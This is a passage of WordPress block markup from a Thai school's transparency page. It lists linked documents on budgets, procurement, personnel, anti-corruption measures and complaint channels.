data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 